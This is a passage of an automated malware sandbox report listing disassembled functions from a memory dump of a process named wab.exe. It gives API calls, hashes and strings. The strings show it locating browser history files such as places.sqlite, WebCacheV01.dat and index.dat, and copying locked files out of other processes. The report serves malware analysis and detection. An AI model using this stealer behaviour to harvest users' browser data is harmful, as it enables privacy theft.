                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProcProcessTimes
                                                • String ID: GetProcessTimes$kernel32.dll
                                                • API String ID: 1714573020-3385500049
                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004087D6
                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                • memset.MSVCRT ref: 00408828
                                                • memset.MSVCRT ref: 00408840
                                                • memset.MSVCRT ref: 00408858
                                                • memset.MSVCRT ref: 00408870
                                                • memset.MSVCRT ref: 00408888
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                • String ID:
                                                • API String ID: 2911713577-0
                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcmp
                                                • String ID: @ $SQLite format 3
                                                • API String ID: 1475443563-3708268960
                                                • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                • memset.MSVCRT ref: 00414C87
                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                • wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressCloseProcVersionmemsetwcscpy
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                • API String ID: 2705122986-2036018995
                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmpqsort
                                                • String ID: /nosort$/sort
                                                • API String ID: 1579243037-1578091866
                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040E60F
                                                • memset.MSVCRT ref: 0040E629
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Strings
                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                • API String ID: 3354267031-2114579845
                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID:
                                                • API String ID: 3473537107-0
                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                • API String ID: 2221118986-1725073988
                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotificationSleep
                                                • String ID: }A
                                                • API String ID: 1821831730-2138825249
                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@DeleteObject
                                                • String ID: r!A
                                                • API String ID: 1103273653-628097481
                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@
                                                • String ID:
                                                • API String ID: 1033339047-0
                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                • memcmp.MSVCRT ref: 00444BA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$memcmp
                                                • String ID: $$8
                                                • API String ID: 2808797137-435121686
                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                • duplicate column name: %s, xrefs: 004307FE
                                                • too many columns on %s, xrefs: 00430763
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: duplicate column name: %s$too many columns on %s
                                                • API String ID: 0-1445880494
                                                • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                  • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                • String ID:
                                                • API String ID: 1042154641-0
                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                • memset.MSVCRT ref: 00403A55
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                • String ID: history.dat$places.sqlite
                                                • API String ID: 3093078384-467022611
                                                • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                • GetLastError.KERNEL32 ref: 00417627
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLast$File$PointerRead
                                                • String ID:
                                                • API String ID: 839530781-0
                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID: *.*$index.dat
                                                • API String ID: 1974802433-2863569691
                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@mallocmemcpy
                                                • String ID:
                                                • API String ID: 3831604043-0
                                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                • GetLastError.KERNEL32 ref: 004175A2
                                                • GetLastError.KERNEL32 ref: 004175A8
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLast$FilePointer
                                                • String ID:
                                                • API String ID: 1156039329-0
                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$ChangeCloseCreateFindNotificationTime
                                                • String ID:
                                                • API String ID: 1631957507-0
                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
